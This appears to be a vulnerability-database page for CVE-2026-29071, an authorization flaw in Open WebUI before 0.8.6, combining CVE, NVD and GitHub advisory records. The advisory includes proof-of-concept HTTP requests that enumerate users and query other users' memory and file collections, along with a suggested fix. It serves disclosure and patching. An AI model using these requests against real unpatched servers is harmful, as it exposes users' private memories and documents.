CVE-2026-29071 (GCVE-0-2026-29071)
Vulnerability from cvelistv5 – Published: 2026-03-26 23:54 – Updated: 2026-03-27 20:06
VLAI?
Title
Open WebUI's Insecure Direct Object Reference (IDOR) allows access to other users' memories
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.
Severity ?
CWE
- CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| open-webui | open-webui |
Affected:
< 0.8.6
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-29071",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-27T20:06:23.684368Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-27T20:06:33.347Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "open-webui",
"vendor": "open-webui",
"versions": [
{
"status": "affected",
"version": "\u003c 0.8.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639: Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T23:54:38.117Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw"
}
],
"source": {
"advisory": "GHSA-w9f8-gxf9-rhvw",
"discovery": "UNKNOWN"
},
"title": "Open WebUI\u0027s Insecure Direct Object Reference (IDOR) allows access to other users\u0027 memories"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-29071",
"datePublished": "2026-03-26T23:54:38.117Z",
"dateReserved": "2026-03-03T20:51:43.482Z",
"dateUpdated": "2026-03-27T20:06:33.347Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-29071\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T00:16:22.983\",\"lastModified\":\"2026-03-27T00:16:22.983\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":3.1,\"baseSeverity\":\"LOW\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29071\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-27T20:06:23.684368Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-27T20:06:28.818Z\"}}], \"cna\": {\"title\": \"Open WebUI\u0027s Insecure Direct Object Reference (IDOR) allows access to other users\u0027 memories\", \"source\": {\"advisory\": \"GHSA-w9f8-gxf9-rhvw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 3.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.6\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T23:54:38.117Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-29071\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-27T20:06:33.347Z\", \"dateReserved\": \"2026-03-03T20:51:43.482Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T23:54:38.117Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-29071
Vulnerability from fkie_nvd - Published: 2026-03-27 00:16 - Updated: 2026-03-27 00:16
Severity ?
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue."
}
],
"id": "CVE-2026-29071",
"lastModified": "2026-03-27T00:16:22.983",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-27T00:16:22.983",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Received",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-639"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-W9F8-GXF9-RHVW
Vulnerability from github – Published: 2026-03-27 15:35 – Updated: 2026-03-27 15:35
VLAI?
Summary
Open WebUI's Insecure Direct Object Reference (IDOR) allows access to other users' memories
Details
Summary
Any authenticated user can read other users' private memories via /api/v1/retrieval/query/collection
Details
Vulnerability 1: Missing authorization in collection querying
In backend/open_webui/routers/retrieval.py, the query_collection_handler function accepts a list of collection_names but performs no ownership validation:
async def query_collection_handler(
request: Request,
form_data: QueryCollectionsForm,
user=Depends(get_verified_user), # Only checks authentication, not authorization
):
Collection names follow predictable patterns:
- User files: file-{FILE_UUID}
- User memories: user-memory-{USER_UUID} (requires Memory experimental feature)
PoC
Environment: Open WebUI v0.8.3, default configuration. Setup: 1. Register two users: admin (first user) and attacker (second user). 2. As admin, upload a PDF document through chat. 3. As admin, enable Memory (Settings → Personalization → Memory) and add some memories.
Exploitation — Step 1: Enumerate all users
GET /api/v1/users/search HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>
Response reveals all users including admin's UUID, email, and role:
{
"users": [
{
"id": "1e4756eb-b064-4781-8b06-4979bca59c8b",
"name": "user",
"email": "user@test.com",
"role": "user"
},
{
"id": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba",
"name": "admin",
"email": "admin@test.com",
"role": "admin"
}
]
}
Exploitation — Step 2: Read admin's memories
Using the admin UUID obtained in Step 1, query their private memory collection:
POST /api/v1/retrieval/query/collection HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>
Content-Type: application/json
{
"collection_names": ["user-memory-<admin_UUID_from_step_1>"],
"query": "test"
}
Response returns admin's private memories:
{
"documents": [["User is testing IDOR", "User - Mariusz, security researcher"]]
}
Note: Step 2 requires the Memory experimental feature to be enabled. Steps 1 and 3 work on default configuration.
Exploitation — Step 3: Read admin's private file (Vulnerability 1)
File collections use the pattern file-{FILE_UUID}. The file UUID must be obtained separately. Once known:
POST /api/v1/retrieval/query/collection HTTP/1.1
Host: <target>
Authorization: Bearer <attacker_token>
Content-Type: application/json
{
"collection_names": ["file-<file_UUID>"],
"query": "test"
}
Response returns admin's private document content and full metadata:
{
"documents": [["Test PDF \nabc \nbcd"]],
"metadatas": [[{
"name": "Test PDF.pdf",
"author": "Mariusz Maik",
"created_by": "81d2f94a-3dfb-479c-af98-e29f0f40c4ba",
"file_id": "243bee10-49ad-466f-884b-67b6b3d74968"
}]]
}
Impact
- Document theft: Any authenticated user can read the full content and metadata of files uploaded by any other user, including admins.
- User enumeration: All user UUIDs, emails, names, and roles are exposed to any authenticated user via
/api/v1/users/search. - Memory leakage: When the Memory experimental feature is enabled, personal memories stored by users for LLM personalization can be read by any other user — directly contradicting the official documentation.
- No admin privileges required: A regular user account is sufficient to exploit all of the above.
Suggested Fix
1. Add ownership validation in /api/v1/retrieval/query/collection:
async def query_collection_handler(
request: Request,
form_data: QueryCollectionsForm,
user=Depends(get_verified_user),
):
for collection_name in form_data.collection_names:
if collection_name.startswith("user-memory-"):
owner_id = collection_name.replace("user-memory-", "")
if owner_id != user.id and user.role != "admin":
raise HTTPException(status_code=403, detail="Access denied")
elif collection_name.startswith("file-"):
file_id = collection_name.replace("file-", "")
# user_has_access_to_file — placeholder; verify file ownership
# e.g. check if created_by matches user.id
if not user_has_access_to_file(user.id, file_id):
raise HTTPException(status_code=403, detail="Access denied")
2. Restrict /api/v1/users/search to admin-only or limit the fields returned to non-privileged users.
Disclosure
AI was used to assist with writing this report. The vulnerability was identified and confirmed through hands-on testing on Open WebUI v0.8.3. All screenshots are from real testing.
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.5"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29071"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T15:35:49Z",
"nvd_published_at": "2026-03-27T00:16:22Z",
"severity": "LOW"
},
"details": "### Summary\nAny authenticated user can read other users\u0027 private memories via `/api/v1/retrieval/query/collection`\n\n### Details\n**Vulnerability 1: Missing authorization in collection querying**\n\nIn `backend/open_webui/routers/retrieval.py`, the `query_collection_handler` function accepts a list of `collection_names` but performs no ownership validation:\n\n```python\nasync def query_collection_handler(\n request: Request,\n form_data: QueryCollectionsForm,\n user=Depends(get_verified_user), # Only checks authentication, not authorization\n):\n```\n\nCollection names follow predictable patterns:\n- User files: `file-{FILE_UUID}`\n- User memories: `user-memory-{USER_UUID}` (requires Memory experimental feature)\n\n### PoC\n**Environment:** Open WebUI v0.8.3, default configuration.\n**Setup:**\n1. Register two users: admin (first user) and attacker (second user).\n2. As admin, upload a PDF document through chat.\n3. As admin, enable Memory (Settings \u2192 Personalization \u2192 Memory) and add some memories.\n\n**Exploitation \u2014 Step 1: Enumerate all users**\n\n```\nGET /api/v1/users/search HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\n```\n\nResponse reveals all users including admin\u0027s UUID, email, and role:\n\n```json\n{\n \"users\": [\n {\n \"id\": \"1e4756eb-b064-4781-8b06-4979bca59c8b\",\n \"name\": \"user\",\n \"email\": \"user@test.com\",\n \"role\": \"user\"\n },\n {\n \"id\": \"81d2f94a-3dfb-479c-af98-e29f0f40c4ba\",\n \"name\": \"admin\",\n \"email\": \"admin@test.com\",\n \"role\": \"admin\"\n }\n ]\n}\n```\n\n\u003cimg width=\"1340\" height=\"731\" alt=\"1poc - users\" src=\"https://github.com/user-attachments/assets/46d1cb64-2f84-480e-b887-819008ddabc9\" /\u003e\n\n**Exploitation \u2014 Step 2: Read admin\u0027s memories**\n\nUsing the admin UUID obtained in Step 1, query their private memory collection:\n\n```\nPOST /api/v1/retrieval/query/collection HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\nContent-Type: application/json\n\n{\n \"collection_names\": [\"user-memory-\u003cadmin_UUID_from_step_1\u003e\"],\n \"query\": \"test\"\n}\n```\n\nResponse returns admin\u0027s private memories:\n\n```json\n{\n \"documents\": [[\"User is testing IDOR\", \"User - Mariusz, security researcher\"]]\n}\n```\n\n\u003cimg width=\"1285\" height=\"606\" alt=\"2poc - memory\" src=\"https://github.com/user-attachments/assets/eac7c129-dcad-4afd-9449-2ca93b19e082\" /\u003e\n\n**Note:** Step 2 requires the Memory experimental feature to be enabled. Steps 1 and 3 work on default configuration.\n\n**Exploitation \u2014 Step 3: Read admin\u0027s private file (Vulnerability 1)**\n\nFile collections use the pattern `file-{FILE_UUID}`. The file UUID must be obtained separately. Once known:\n\n```\nPOST /api/v1/retrieval/query/collection HTTP/1.1\nHost: \u003ctarget\u003e\nAuthorization: Bearer \u003cattacker_token\u003e\nContent-Type: application/json\n\n{\n \"collection_names\": [\"file-\u003cfile_UUID\u003e\"],\n \"query\": \"test\"\n}\n```\n\nResponse returns admin\u0027s private document content and full metadata:\n\n```json\n{\n \"documents\": [[\"Test PDF \\nabc \\nbcd\"]],\n \"metadatas\": [[{\n \"name\": \"Test PDF.pdf\",\n \"author\": \"Mariusz Maik\",\n \"created_by\": \"81d2f94a-3dfb-479c-af98-e29f0f40c4ba\",\n \"file_id\": \"243bee10-49ad-466f-884b-67b6b3d74968\"\n }]]\n}\n```\n\n\u003cimg width=\"1413\" height=\"908\" alt=\"image\" src=\"https://github.com/user-attachments/assets/43041261-ec98-4f3f-8c26-a0c63ef18596\" /\u003e\n\n### Impact\n- **Document theft:** Any authenticated user can read the full content and metadata of files uploaded by any other user, including admins.\n- **User enumeration:** All user UUIDs, emails, names, and roles are exposed to any authenticated user via `/api/v1/users/search`.\n- **Memory leakage:** When the Memory experimental feature is enabled, personal memories stored by users for LLM personalization can be read by any other user \u2014 directly contradicting the official documentation.\n- **No admin privileges required:** A regular user account is sufficient to exploit all of the above.\n\n### Suggested Fix\n\n**1. Add ownership validation in `/api/v1/retrieval/query/collection`:**\n\n```python\nasync def query_collection_handler(\n request: Request,\n form_data: QueryCollectionsForm,\n user=Depends(get_verified_user),\n):\n for collection_name in form_data.collection_names:\n if collection_name.startswith(\"user-memory-\"):\n owner_id = collection_name.replace(\"user-memory-\", \"\")\n if owner_id != user.id and user.role != \"admin\":\n raise HTTPException(status_code=403, detail=\"Access denied\")\n elif collection_name.startswith(\"file-\"):\n file_id = collection_name.replace(\"file-\", \"\")\n # user_has_access_to_file \u2014 placeholder; verify file ownership\n # e.g. check if created_by matches user.id\n if not user_has_access_to_file(user.id, file_id):\n raise HTTPException(status_code=403, detail=\"Access denied\")\n```\n\n**2. Restrict `/api/v1/users/search`** to admin-only or limit the fields returned to non-privileged users.\n\n### Disclosure\n\nAI was used to assist with writing this report. The vulnerability was identified and confirmed through hands-on testing on Open WebUI v0.8.3. All screenshots are from real testing.",
"id": "GHSA-w9f8-gxf9-rhvw",
"modified": "2026-03-27T15:35:49Z",
"published": "2026-03-27T15:35:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29071"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI\u0027s Insecure Direct Object Reference (IDOR) allows access to other users\u0027 memories"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…